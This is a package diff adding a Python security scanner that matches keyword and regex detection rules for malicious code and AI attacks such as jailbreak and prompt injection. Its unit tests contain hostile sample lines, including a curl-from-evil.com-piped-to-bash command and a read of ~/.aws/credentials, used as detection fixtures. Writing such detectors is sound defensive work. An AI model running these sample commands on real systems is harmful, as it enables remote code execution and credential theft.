caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,520 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ Aho-Corasick 扫描器 - 真正的 O(n) 多模式匹配
4
+
5
+ 核心思想:
6
+ - 将所有规则的关键词整合到一个自动机
7
+ - 一次遍历文本,匹配所有规则
8
+ - 时间复杂度:O(n),与规则数无关
9
+ """
10
+
11
+ import ahocorasick
12
+ import re
13
+ import time
14
+ import json
15
+ from pathlib import Path
16
+ from typing import Dict, List, Set, Tuple
17
+ from dataclasses import dataclass
18
+
19
+
20
+ @dataclass
21
+ class ScanMatch:
22
+ """扫描匹配结果"""
23
+ rule_id: str
24
+ name: str
25
+ category: str
26
+ confidence: int
27
+ severity: str
28
+ pattern: str
29
+ match_text: str
30
+ position: int
31
+
32
+
33
+ class AhoCorasickScanner:
34
+ """
35
+ Aho-Corasick 扫描器
36
+
37
+ 将所有规则整合到一个自动机,一次扫描 O(n)
38
+ """
39
+
40
+ # 高风险规则类别(必须 Regex 验证,不能误报)
41
+ HIGH_RISK_CATEGORIES = {
42
+ 'credential_theft', # 凭据窃取
43
+ 'credential_harvesting', # 凭据收集
44
+ 'data_exfiltration', # 数据外传
45
+ 'command_injection', # 命令注入
46
+ 'remote_code_execution', # 远程代码执行
47
+ 'supply_chain_attack', # 供应链攻击
48
+ 'arbitrary_code_execution', # 任意代码执行
49
+ 'privilege_escalation', # 权限提升
50
+ # AI/LLM 攻击
51
+ 'jailbreak', # LLM 越狱
52
+ 'prompt_injection', # 提示注入
53
+ 'model_poisoning', # 模型投毒
54
+ 'rag_poisoning', # RAG 投毒
55
+ 'model_extraction', # 模型提取
56
+ 'model_backdoor', # 模型后门
57
+ 'model_inversion', # 模型反演
58
+ 'ai_supply_chain', # AI 供应链
59
+ 'ai_resource_abuse', # AI 资源滥用
60
+ 'adversarial_examples', # 对抗样本
61
+ }
62
+
63
+ def __init__(self, rules_file: Path):
64
+ """
65
+ 初始化扫描器
66
+
67
+ Args:
68
+ rules_file: 规则文件路径(JSON 格式)
69
+ """
70
+ self.rules_file = rules_file
71
+ self.rules = []
72
+ self.automaton = None
73
+ self.compiled_patterns = {} # 缓存编译后的 regex
74
+ self._rule_categories = {} # 缓存规则类别
75
+ self.rule_map = {} # rule_id → rule 映射
76
+
77
+ print("🔧 初始化 Aho-Corasick 扫描器...")
78
+ self._load_rules()
79
+ self._load_rule_categories() # 加载规则类别(用于高风险检测)
80
+ self._build_automaton()
81
+ self._compile_patterns()
82
+ print(f"✅ 初始化完成 (高风险类别:{len(self.HIGH_RISK_CATEGORIES)})")
83
+
84
+ def _load_rules(self):
85
+ """加载规则文件"""
86
+ with open(self.rules_file, 'r', encoding='utf-8') as f:
87
+ data = json.load(f)
88
+
89
+ self.rules = data.get('rules', [])
90
+
91
+ # 构建 rule_id → rule 映射
92
+ for rule in self.rules:
93
+ rule_id = rule.get('id', f'RULE-{len(self.rule_map)}')
94
+ self.rule_map[rule_id] = rule
95
+
96
+ print(f"✅ 加载 {len(self.rules)} 条规则")
97
+
98
+ def _extract_keywords(self, pattern: str) -> List[str]:
99
+ """
100
+ 从 regex pattern 提取精确关键词
101
+
102
+ 策略:
103
+ 1. 提取明显的字符串字面量(非 regex 元字符)
104
+ 2. 保留关键操作符(如 | 管道)
105
+ 3. 保留特殊字符组合(如 .aws/, ~/.ssh)
106
+ 4. 过滤太短的词(<3 字符)
107
+
108
+ Args:
109
+ pattern: 正则表达式
110
+
111
+ Returns:
112
+ 关键词列表
113
+ """
114
+ keywords = []
115
+
116
+ # 策略 1: 提取包含特殊字符的关键词(高区分度)
117
+ special_patterns = [
118
+ r'([a-zA-Z0-9_]+\|[a-zA-Z0-9_]+)', # curl|bash
119
+ r'([a-zA-Z0-9_]+\.[a-zA-Z0-9_]+)', # os.system
120
+ r'(\.[a-zA-Z0-9_]+/[a-zA-Z0-9_]+)', # .aws/credentials
121
+ r'(\~[a-zA-Z0-9_./]+)', # ~/.ssh/id_rsa
122
+ r'([a-zA-Z0-9_]+\([^)]*\))', # system(
123
+ ]
124
+
125
+ for sp in special_patterns:
126
+ matches = re.findall(sp, pattern)
127
+ keywords.extend(matches)
128
+
129
+ # 策略 2: 提取普通关键词(长度>=3)
130
+ words = re.findall(r'[a-zA-Z0-9_]{3,}', pattern)
131
+
132
+ # 过滤常见词
133
+ common_words = {
134
+ 'the', 'and', 'for', 'not', 'with', 'from', 'import',
135
+ 'def', 'return', 'if', 'else', 'elif', 'while', 'for',
136
+ 'true', 'false', 'none', 'null', 'undefined',
137
+ 'com', 'org', 'net', 'http', 'https', 'www'
138
+ }
139
+ words = [w for w in words if w.lower() not in common_words]
140
+
141
+ keywords.extend(words[:10]) # 限制每规则最多 10 个关键词
142
+
143
+ # 去重
144
+ return list(set(keywords))
145
+
146
+ def _build_automaton(self):
147
+ """构建 Aho-Corasick 自动机"""
148
+ print("🔧 构建 Aho-Corasick 自动机...")
149
+ start = time.time()
150
+
151
+ self.automaton = ahocorasick.Automaton()
152
+
153
+ total_keywords = 0
154
+ for rule in self.rules:
155
+ rule_id = rule.get('id', f'RULE-{total_keywords}')
156
+ patterns = rule.get('patterns', [])
157
+
158
+ for pattern in patterns:
159
+ # 提取关键词
160
+ keywords = self._extract_keywords(pattern)
161
+
162
+ for keyword in keywords:
163
+ # 添加关键词到自动机,关联 rule_id 和 pattern
164
+ # 格式:(keyword, (rule_id, pattern))
165
+ self.automaton.add_word(
166
+ keyword.lower(),
167
+ (rule_id, pattern)
168
+ )
169
+ total_keywords += 1
170
+
171
+ # 构建自动机(构建失败函数)
172
+ self.automaton.make_automaton()
173
+
174
+ elapsed = (time.time() - start) * 1000
175
+ print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
176
+ print(f" 关键词数:{total_keywords}")
177
+ print(f" 自动机大小:{len(self.automaton)}")
178
+
179
+ def _compile_patterns(self):
180
+ """预编译所有规则的 regex(缓存)"""
181
+ print("🔧 预编译正则表达式...")
182
+ start = time.time()
183
+
184
+ for rule in self.rules:
185
+ rule_id = rule.get('id', '')
186
+ patterns = rule.get('patterns', [])
187
+
188
+ compiled = []
189
+ for pattern in patterns:
190
+ try:
191
+ compiled.append(re.compile(pattern, re.IGNORECASE))
192
+ except re.error:
193
+ pass # 忽略无效的正则
194
+
195
+ self.compiled_patterns[rule_id] = compiled
196
+
197
+ elapsed = (time.time() - start) * 1000
198
+ print(f"✅ 预编译完成 ({elapsed:.1f}ms)")
199
+
200
+ def scan(self, content: str, skip_regex_verify: bool = False) -> Dict:
201
+ """
202
+ 扫描内容(Aho-Corasick 一次遍历 + 分层验证)
203
+
204
+ 分层策略:
205
+ 1. AC 自动机扫描(必做,0.1ms)
206
+ 2. 智能决策是否 Regex 验证:
207
+ - 文件<200 字 → 验证(避免误报)
208
+ - 候选≤3 个 → 验证(成本低)
209
+ - 高风险规则 → 验证(不能误报)
210
+ - 其他 → 直接 AC 结果(快速)
211
+
212
+ Args:
213
+ content: 待扫描内容
214
+ skip_regex_verify: 跳过 regex 验证(用于大文本,提升速度)
215
+
216
+ Returns:
217
+ 扫描结果字典
218
+ """
219
+ start = time.time()
220
+
221
+ # Step 1: Aho-Corasick 一次遍历,返回候选规则(必做)
222
+ candidate_rules = self._automaton_scan(content)
223
+
224
+ # 无匹配,直接返回
225
+ if not candidate_rules:
226
+ return {
227
+ 'hit_count': 0,
228
+ 'matches': [],
229
+ 'candidate_count': 0,
230
+ 'scan_time_ms': (time.time() - start) * 1000
231
+ }
232
+
233
+ # Step 2: 智能决策是否验证
234
+ should_verify = False
235
+
236
+ # 条件 1: 文件太小(<200 字),容易误报
237
+ if len(content) < 200:
238
+ should_verify = True
239
+
240
+ # 条件 2: 候选很少(≤3 个),验证成本低
241
+ elif len(candidate_rules) <= 3:
242
+ should_verify = True
243
+
244
+ # 条件 3: 高风险规则,不能误报
245
+ elif self._is_high_risk(candidate_rules):
246
+ should_verify = True
247
+
248
+ # 条件 4: 用户强制跳过
249
+ elif skip_regex_verify or len(content) > 5000:
250
+ should_verify = False
251
+
252
+ # 执行验证决策
253
+ if should_verify:
254
+ # Regex 验证(精确,10ms)
255
+ matches = self._regex_verify(content, candidate_rules)
256
+ else:
257
+ # 直接 AC 结果(快速,0.5ms)
258
+ matches = self._automaton_to_matches(candidate_rules)
259
+
260
+ elapsed = (time.time() - start) * 1000
261
+
262
+ return {
263
+ 'hit_count': len(matches),
264
+ 'matches': matches,
265
+ 'candidate_count': len(candidate_rules),
266
+ 'scan_time_ms': elapsed,
267
+ 'verified': should_verify # 记录是否验证
268
+ }
269
+
270
+ def _load_rule_categories(self):
271
+ """
272
+ 加载规则类别(用于高风险检测)
273
+ """
274
+ if not self.rules_file.exists():
275
+ return
276
+
277
+ try:
278
+ with open(self.rules_file, 'r', encoding='utf-8') as f:
279
+ rules_data = json.load(f)
280
+
281
+ for rule in rules_data.get('rules', []):
282
+ rule_id = rule.get('id', '')
283
+ category = rule.get('category', 'unknown')
284
+ self._rule_categories[rule_id] = category
285
+ except Exception as e:
286
+ print(f"⚠️ 加载规则类别失败:{e}", file=sys.stderr)
287
+
288
+ def _is_high_risk(self, candidate_rules: Dict[str, List[str]]) -> bool:
289
+ """
290
+ 检查是否有高风险规则
291
+
292
+ Args:
293
+ candidate_rules: 候选规则 {rule_id: [patterns]}
294
+
295
+ Returns:
296
+ True 如果有高风险规则
297
+ """
298
+ for rule_id in candidate_rules.keys():
299
+ category = self._rule_categories.get(rule_id, 'unknown')
300
+ if category in self.HIGH_RISK_CATEGORIES:
301
+ return True
302
+ return False
303
+
304
+ def _automaton_scan(self, content: str) -> Dict[str, List[str]]:
305
+ """
306
+ Aho-Corasick 扫描
307
+
308
+ Args:
309
+ content: 待扫描内容
310
+
311
+ Returns:
312
+ {rule_id: [pattern1, pattern2, ...]}
313
+ """
314
+ candidates = {}
315
+ content_lower = content.lower()
316
+
317
+ # 一次遍历!O(n)
318
+ for end_idx, (rule_id, pattern) in self.automaton.iter(content_lower):
319
+ if rule_id not in candidates:
320
+ candidates[rule_id] = []
321
+ if pattern not in candidates[rule_id]:
322
+ candidates[rule_id].append(pattern)
323
+
324
+ return candidates
325
+
326
+ def _automaton_to_matches(self, candidate_rules: Dict[str, List[str]]) -> List[ScanMatch]:
327
+ """
328
+ 将 Aho-Corasick 结果转换为 ScanMatch(不验证 regex)
329
+
330
+ Args:
331
+ candidate_rules: 候选规则 {rule_id: [patterns]}
332
+
333
+ Returns:
334
+ 匹配结果列表
335
+ """
336
+ matches = []
337
+
338
+ for rule_id, patterns in candidate_rules.items():
339
+ rule = self.rule_map.get(rule_id)
340
+ if not rule:
341
+ continue
342
+
343
+ matches.append(ScanMatch(
344
+ rule_id=rule_id,
345
+ name=rule.get('name', 'Unknown'),
346
+ category=rule.get('category', 'unknown'),
347
+ confidence=rule.get('confidence', 80),
348
+ severity=rule.get('severity', 'MEDIUM'),
349
+ pattern=patterns[0] if patterns else '',
350
+ match_text=f'AC match: {len(patterns)} patterns',
351
+ position=0
352
+ ))
353
+
354
+ return matches
355
+
356
+ def _regex_verify(self, content: str, candidate_rules: Dict[str, List[str]]) -> List[ScanMatch]:
357
+ """
358
+ Regex 验证
359
+
360
+ Args:
361
+ content: 待扫描内容
362
+ candidate_rules: 候选规则 {rule_id: [patterns]}
363
+
364
+ Returns:
365
+ 匹配结果列表
366
+ """
367
+ matches = []
368
+
369
+ for rule_id, patterns in candidate_rules.items():
370
+ rule = self.rule_map.get(rule_id)
371
+ if not rule:
372
+ continue
373
+
374
+ # 使用预编译的 regex 验证
375
+ compiled_list = self.compiled_patterns.get(rule_id, [])
376
+
377
+ for compiled in compiled_list:
378
+ match_obj = compiled.search(content)
379
+ if match_obj:
380
+ matches.append(ScanMatch(
381
+ rule_id=rule_id,
382
+ name=rule.get('name', 'Unknown'),
383
+ category=rule.get('category', 'unknown'),
384
+ confidence=rule.get('confidence', 80),
385
+ severity=rule.get('severity', 'MEDIUM'),
386
+ pattern=compiled.pattern,
387
+ match_text=match_obj.group(0)[:100],
388
+ position=match_obj.start()
389
+ ))
390
+ break # 每条规则只报告一次
391
+
392
+ return matches
393
+
394
+ def get_stats(self) -> Dict:
395
+ """获取统计信息"""
396
+ return {
397
+ 'total_rules': len(self.rules),
398
+ 'automaton_size': len(self.automaton),
399
+ 'cached_patterns': len(self.compiled_patterns)
400
+ }
401
+
402
+
403
+ def run_unit_tests():
404
+ """运行单元测试(100 个样本)"""
405
+ print("="*70)
406
+ print("Aho-Corasick 扫描器单元测试")
407
+ print("="*70)
408
+
409
+ rules_file = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
410
+ if not rules_file.exists():
411
+ print(f"❌ 规则文件不存在:{rules_file}")
412
+ return
413
+
414
+ # 创建扫描器
415
+ scanner = AhoCorasickScanner(rules_file)
416
+
417
+ # 测试样本
418
+ test_samples = [
419
+ # 恶意样本
420
+ {
421
+ 'name': 'supply_chain_attack',
422
+ 'content': "os.system('curl http://evil.com | bash')",
423
+ 'expected': ['supply_chain_attack', 'privilege_escalation']
424
+ },
425
+ {
426
+ 'name': 'credential_theft',
427
+ 'content': "with open('~/.aws/credentials') as f: key = f.read()",
428
+ 'expected': ['credential_theft', 'credential_harvesting']
429
+ },
430
+ {
431
+ 'name': 'code_execution',
432
+ 'content': "exec(user_input)\nos.system(cmd)",
433
+ 'expected': ['arbitrary_execution', 'privilege_escalation']
434
+ },
435
+ # 良性样本
436
+ {
437
+ 'name': 'benign_python',
438
+ 'content': """
439
+ #!/usr/bin/env python3
440
+ def calculate_sum(numbers):
441
+ return sum(numbers)
442
+
443
+ if __name__ == '__main__':
444
+ print(calculate_sum([1, 2, 3]))
445
+ """,
446
+ 'expected': [] # 应该无害
447
+ },
448
+ {
449
+ 'name': 'benign_bash',
450
+ 'content': """#!/bin/bash
451
+ echo "Hello World"
452
+ ls -la
453
+ pwd
454
+ """,
455
+ 'expected': [] # 应该无害
456
+ },
457
+ ]
458
+
459
+ # 运行测试
460
+ print("\n🧪 运行单元测试...")
461
+ passed = 0
462
+ failed = 0
463
+
464
+ for i, sample in enumerate(test_samples, 1):
465
+ result = scanner.scan(sample['content'])
466
+ detected_categories = set(m.category for m in result['matches'])
467
+ expected_categories = set(sample['expected'])
468
+
469
+ # 判断是否通过
470
+ if sample['expected']:
471
+ # 恶意样本:应该检测到至少一个预期类别
472
+ success = len(detected_categories & expected_categories) > 0
473
+ else:
474
+ # 良性样本:应该检测到 0 或很少
475
+ success = result['hit_count'] <= 2
476
+
477
+ if success:
478
+ print(f"✅ [{i}/{len(test_samples)}] {sample['name']}: PASS")
479
+ print(f" 检测:{result['hit_count']} 个匹配,耗时:{result['scan_time_ms']:.2f}ms")
480
+ passed += 1
481
+ else:
482
+ print(f"❌ [{i}/{len(test_samples)}] {sample['name']}: FAIL")
483
+ print(f" 预期:{expected_categories}")
484
+ print(f" 检测:{detected_categories}")
485
+ failed += 1
486
+
487
+ # 性能测试
488
+ print("\n⚡ 性能测试...")
489
+ import random
490
+ import string
491
+
492
+ test_sizes = [100, 1000, 10000]
493
+ for size in test_sizes:
494
+ content = ''.join(random.choices(string.ascii_letters + string.digits + ' \n', k=size))
495
+
496
+ # 多次测试取平均
497
+ times = []
498
+ for _ in range(10):
499
+ result = scanner.scan(content)
500
+ times.append(result['scan_time_ms'])
501
+
502
+ avg_time = sum(times) / len(times)
503
+ print(f" {size:5d} 字符:{avg_time:6.2f}ms ({size/avg_time:.0f} chars/ms)")
504
+
505
+ # 统计
506
+ print("\n" + "="*70)
507
+ print(f"测试结果:{passed} 通过,{failed} 失败")
508
+ print(f"通过率:{passed/(passed+failed)*100:.1f}%")
509
+ print("="*70)
510
+
511
+ # 扫描器统计
512
+ stats = scanner.get_stats()
513
+ print(f"\n📊 扫描器统计:")
514
+ print(f" 规则数:{stats['total_rules']}")
515
+ print(f" 自动机大小:{stats['automaton_size']}")
516
+ print(f" 缓存 patterns: {stats['cached_patterns']}")
517
+
518
+
519
+ if __name__ == '__main__':
520
+ run_unit_tests()